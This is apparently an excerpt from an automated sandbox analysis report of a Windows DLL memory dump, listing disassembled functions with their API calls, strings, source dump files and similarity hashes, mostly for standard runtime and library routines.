Function 6E9C9350, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E9C937B
___except_validate_context_record.LIBVCRUNTIME ref: 6E9C9383
_ValidateLocalCookies.LIBCMT ref: 6E9C9411
__IsNonwritableInCurrentImage.LIBCMT ref: 6E9C943C
_ValidateLocalCookies.LIBCMT ref: 6E9C9491

Strings

csm, xrefs: 6E9C9426

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0d66de3ba636428ef205fddd4b7fb75eace5514813cee084a1e5f173e66ac422
Instruction ID: fee09744577cf1445d4c358263c5cde60ee117421db0390a382051cc4e18262b
Opcode Fuzzy Hash: 0d66de3ba636428ef205fddd4b7fb75eace5514813cee084a1e5f173e66ac422
Instruction Fuzzy Hash: 6141C130A04259DBCF00EFA9C880A9EBBB9AF8571CF148555EC15AB391D735DA06CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,B5334A76,?,00000000,?,00000000,8007000E), ref: 6E9C86F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E9C872A

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 7317bb0c7b89b0cdc02d33fbe0022ae96d3088b179cdb67e2c84dee699df6422
Instruction ID: 81bd7f376b2627d87f2f68997ea35d7e4dd0a4093ed10c19f3744fe2392984cf
Opcode Fuzzy Hash: 7317bb0c7b89b0cdc02d33fbe0022ae96d3088b179cdb67e2c84dee699df6422
Instruction Fuzzy Hash: 0F3128B2604309ABD724AFA49C45FAA77BCEF40F10F100529FA05E6280E772F5008EA7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C3380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E9C3410
GetWindowLongW.USER32(?,000000FC), ref: 6E9C3424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E9C343A
GetWindowLongW.USER32(?,000000FC), ref: 6E9C3453
SetWindowLongW.USER32 ref: 6E9C3462

Strings

$, xrefs: 6E9C33C4

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 86b89107b382b036b1f1b40e01f687aa9ae1043836bf34d43de096f76fde595d
Instruction ID: 51275e695d459b3a195704d125621c03c847ac57fb3d59baeab50c1761eeec15
Opcode Fuzzy Hash: 86b89107b382b036b1f1b40e01f687aa9ae1043836bf34d43de096f76fde595d
Instruction Fuzzy Hash: 62412871900709AFCB21DFA9C884A9EBBF5FF48710F108A5DE956A7260D731E904CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,B5334A76), ref: 6E9BE494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E9BE4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,B5334A76), ref: 6E9BE4E0
RegCloseKey.ADVAPI32(00000000), ref: 6E9BE4F3

Strings

RegOpenKeyTransactedW, xrefs: 6E9BE4A5
Advapi32.dll, xrefs: 6E9BE48F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 3a5a56753f41205df60767b10063879f7c615def23e8436fe773c3c98b8d3d82
Instruction ID: efc180b2ae6d8692eb439f9a8940c706dc3851307a9ad770d3ff591b6ef6ad01
Opcode Fuzzy Hash: 3a5a56753f41205df60767b10063879f7c615def23e8436fe773c3c98b8d3d82
Instruction Fuzzy Hash: C63150B1A0460AAFDB24CF95C844BABB7BDEF45710F108569F915AB344E734E900CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E9B8C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9B8C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E9B8C44
SysFreeString.OLEAUT32(00000000), ref: 6E9B8C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E9B8C76
SysFreeString.OLEAUT32(00000000), ref: 6E9B8C83
SysFreeString.OLEAUT32 ref: 6E9B8CB2

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: bfc4e4f1896e08572e8939e959e35655632f65be72e2b6f14a6539cada841a18
Instruction ID: 59cbf40de8af7b387449ae9d1bd018822485fba9e41a71952baf49b56c4377dc
Opcode Fuzzy Hash: bfc4e4f1896e08572e8939e959e35655632f65be72e2b6f14a6539cada841a18
Instruction Fuzzy Hash: 241102B1649716BBCB355AA48C49F9F7B78EF46B20F200265FA11AA2C4DB7099048B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DDFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6E9DDFF9
ext-ms-, xrefs: 6E9DE00D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: a748556f0592b155128f9b71054b3be977e0a93e4eb0fb3819d52cce9a7164ec
Instruction ID: 5c050bc1beee9e22b36aed4b6e31ac13219cbc06a89c9109bff1f2c8bf9bd68e
Opcode Fuzzy Hash: a748556f0592b155128f9b71054b3be977e0a93e4eb0fb3819d52cce9a7164ec
Instruction Fuzzy Hash: D721F9B1D49E39EBC7714AE9CC80B6AB76C9F46760F118510ED15A7284E630E809CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B21F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B221D

Part of subcall function 6E9C94A7: RaiseException.KERNEL32(?,?,6E9C6476,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E9C6476,000000FF,6E9FCD2C,?,000000FF), ref: 6E9C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E9B228F

Strings

ios_base::failbit set, xrefs: 6E9B2135, 6E9B2231
ios_base::badbit set, xrefs: 6E9B2227, 6E9B2252, 6E9B2273
ios_base::eofbit set, xrefs: 6E9B2236

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 35ab521b2e8462678a5a70de3faa2fef05ec850c5a8f05de1d196b6f9d865e40
Instruction ID: 1337f0cd208d5bfc79ac59209c9cb9d093aa801beff604989fb9911d13a220c2
Opcode Fuzzy Hash: 35ab521b2e8462678a5a70de3faa2fef05ec850c5a8f05de1d196b6f9d865e40
Instruction Fuzzy Hash: 8A11D2B2910305AFC714DFE9D801BC6B3ECEF55224F048A1AFA68DB640E771E5558FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E9E4BFD: _free.LIBCMT ref: 6E9E4C26

_free.LIBCMT ref: 6E9E4F04

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E4F0F
_free.LIBCMT ref: 6E9E4F1A
_free.LIBCMT ref: 6E9E4F6E
_free.LIBCMT ref: 6E9E4F79
_free.LIBCMT ref: 6E9E4F84
_free.LIBCMT ref: 6E9E4F8F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 7916754d6476baa8babbdbee25ccf26e6fa07279ead5f9d1c3d2c033000d0c13
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: B9115171950F18BAD622ABF0CC05FDF779C6FA0708F444C15A39EA6450DB79F50A8E50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DF447, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E9CE12A,6E9CE12A,?,?,?,6E9DF698,00000001,00000001,F9E85006), ref: 6E9DF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E9DF698,00000001,00000001,F9E85006,?,?,?), ref: 6E9DF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E9DF621
__freea.LIBCMT ref: 6E9DF62E

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

__freea.LIBCMT ref: 6E9DF637
__freea.LIBCMT ref: 6E9DF65C

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cf573bcc8cd6a3cc4167a089c55625a8e579116684ae2a2100661bb2d6ac99b5
Instruction ID: 74a8fec480b2849e9a20cf1f381c1ad01ec14f16d8a8b3d5b4b9e8d1641fdf48
Opcode Fuzzy Hash: cf573bcc8cd6a3cc4167a089c55625a8e579116684ae2a2100661bb2d6ac99b5
Instruction Fuzzy Hash: D1513972600A2AAFEB158EE4CC42EAF77ADEF40758F258628FD14D6150EB34DC48CE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1810, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6E9C18BE

Part of subcall function 6E9C34B0: EnterCriticalSection.KERNEL32(6E9FFAA4,?,?), ref: 6E9C34FA
Part of subcall function 6E9C34B0: GetClassInfoExW.USER32 ref: 6E9C352D
Part of subcall function 6E9C34B0: GetClassInfoExW.USER32 ref: 6E9C3544
Part of subcall function 6E9C34B0: LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C3553

Part of subcall function 6E9C8508: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E9C3342), ref: 6E9C850D
Part of subcall function 6E9C8508: HeapAlloc.KERNEL32(00000000), ref: 6E9C8514

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,6E9E9D70,000000FF), ref: 6E9C1909
GetCurrentThreadId.KERNEL32 ref: 6E9C19AE
EnterCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C19BC
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C19D5
CreateWindowExW.USER32 ref: 6E9C1A0B

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: d6e5e7c04787d9c5820573aaf4717f6af0b80b75afeb4b6f57782d648d2720cb
Instruction ID: 9768735a593522141bbb3b75c03f862a6c8e1130556cca9aa7c1ff711df56ffe
Opcode Fuzzy Hash: d6e5e7c04787d9c5820573aaf4717f6af0b80b75afeb4b6f57782d648d2720cb
Instruction Fuzzy Hash: 046181B1A00609EFDB14DFA9D844BAEB7B8EF49714F108119E915AB344E730E904CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BEEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,B5334A76,00000000,00000000), ref: 6E9BEEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6E9BEF1B
CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF34
CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E9BEFAE

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 9af68f5ce9688de898f7e37fc443d7140f16097de19546e364d03e1fa935a4ae
Instruction ID: dd1efce564a84223f5f301c200bcabd46778fe75614434901cb2f82218f2b56e
Opcode Fuzzy Hash: 9af68f5ce9688de898f7e37fc443d7140f16097de19546e364d03e1fa935a4ae
Instruction Fuzzy Hash: 8141E879A1421ACFCB10DFA9C88056BB7FAEF99315B6044A6E449C7358E731D982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B44A9
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B44CB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B44EB
__Getctype.LIBCPMT ref: 6E9B4587
std::_Facet_Register.LIBCPMT ref: 6E9B45A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B45C6

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 180e9d7922a95b76a6a776ab65b514fbe43bc46b8d0cf2de2ee392ebe0a4ca1d
Instruction ID: 21772af636e597f8ee93452ec8fc467f4d3870c3c076210ba1da76b20ae371b2
Opcode Fuzzy Hash: 180e9d7922a95b76a6a776ab65b514fbe43bc46b8d0cf2de2ee392ebe0a4ca1d
Instruction Fuzzy Hash: 97518F719047049FCB11DF98C480A9FB7B8EF55B18F14856DD809AB281EB70E946CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E9BE440: GetModuleHandleW.KERNEL32(Advapi32.dll,B5334A76), ref: 6E9BE494
Part of subcall function 6E9BE440: RegCloseKey.ADVAPI32(00000000), ref: 6E9BE4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6E9BE592
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6E9BE5DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6E9BE613
RegCloseKey.ADVAPI32(?), ref: 6E9BE628
RegCloseKey.ADVAPI32(?), ref: 6E9BE650
RegCloseKey.ADVAPI32(?), ref: 6E9BE678

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 1b6f06455a3adb6166415cf621e1c2fb6091a4b91a06b9ca71cda5f6ad10613a
Instruction ID: 65ac4809a88e6c9a4bf986871e1594dacfc09bb50b4fb12b1a38c411a1352164
Opcode Fuzzy Hash: 1b6f06455a3adb6166415cf621e1c2fb6091a4b91a06b9ca71cda5f6ad10613a
Instruction Fuzzy Hash: EC412EB22083059BD724DFA5D854BABB7ECEF88355F00496EF955D7240EB70E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CB2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E9C92CF,6E9C4EA0,6E9C5531,?,6E9C574E,?,00000001,?,?,00000001,?,6E9FCC28,0000000C,6E9C5842), ref: 6E9CB2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9CB2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9CB2D6
SetLastError.KERNEL32(00000000,6E9C574E,?,00000001,?,?,00000001,?,6E9FCC28,0000000C,6E9C5842,?,00000001,?), ref: 6E9CB328

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3030641a030e93dae348994829324dc74d5bb71820d29c28ca1a0c6441d225c3
Instruction ID: 378a5c2bd7b180b7156db08c0b3fe8e168be7184765d96991afb97aa21960294
Opcode Fuzzy Hash: 3030641a030e93dae348994829324dc74d5bb71820d29c28ca1a0c6441d225c3
Instruction Fuzzy Hash: E001F57211D7125EA66035F57C9466A3A6CEF52EBDB200A2AF924492D8FF11C8028D47

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C6698, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E9C669F
std::_Lockit::_Lockit.LIBCPMT ref: 6E9C66A9

Part of subcall function 6E9B19B0: std::_Lockit::_Lockit.LIBCPMT ref: 6E9B19CD
Part of subcall function 6E9B19B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B19E9

codecvt.LIBCPMT ref: 6E9C66E3
std::_Facet_Register.LIBCPMT ref: 6E9C66FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9C671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E9C6738

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 38bbb37ef6fbff882d90512888fed8bc67e21a91ee3a352bc9149f968ef13284
Instruction ID: f73d4f14357232f0a41f642717663dd924399ddb4a5a3ccff43c097374d22fbb
Opcode Fuzzy Hash: 38bbb37ef6fbff882d90512888fed8bc67e21a91ee3a352bc9149f968ef13284
Instruction Fuzzy Hash: 19119E729102199BCF05EBE0C894AFE77B9AFA5B18F140909D5116B290DF34DA45CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B91C0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E9B9563
_com_issue_error.COMSUPP ref: 6E9B956D
_com_issue_error.COMSUPP ref: 6E9B9577
_com_issue_error.COMSUPP ref: 6E9B957D
_com_issue_error.COMSUPP ref: 6E9B9587
_com_issue_error.COMSUPP ref: 6E9B9591

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: cb2f8c3e6c4ace32718b57499ce84c23856e1e7e2433ebda383d88ed640ed4cb
Instruction ID: 48da31ed570afcaf01f549cfa6bc0b8d8f3f61584df39c24a99cc910d9525578
Opcode Fuzzy Hash: cb2f8c3e6c4ace32718b57499ce84c23856e1e7e2433ebda383d88ed640ed4cb
Instruction Fuzzy Hash: D6F096F550018DAEE715AFE48900F9F77ACEF50A18F10052CAE147A244C730B500CA5F

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E9BBC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,B5334A76,00000000,?), ref: 6E9BBCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E9C13E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E9C1483
PdhCloseQuery.PDH(?,?,00000000), ref: 6E9C1498

Strings

edit, xrefs: 6E9C13E0
0, xrefs: 6E9C1547

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: edf7ad4181c1d7a203f4d112cef42ee393e359686c1bd7f5f58da19f8576a526
Instruction ID: 6c3bb3ad63291695b01d17b36c44fcb04d017e51d0845935f1147d51a836dce9
Opcode Fuzzy Hash: edf7ad4181c1d7a203f4d112cef42ee393e359686c1bd7f5f58da19f8576a526
Instruction Fuzzy Hash: 66A1F2716003068BD704EF69C990B9AB7B9BF86718F104A1CE9558B291D731F988CFD7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9DD196

Strings

*?, xrefs: 6E9DD04F
., xrefs: 6E9DD39F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: 69ed4060a7730b308261a698dc175966bc162850c351185dd83203d50e7e09d2
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: CC613BB5D14619AFDB04CFE8C8808EDFBF9EF88310B14866AD855A7304D771EA458F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B2120, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B221D

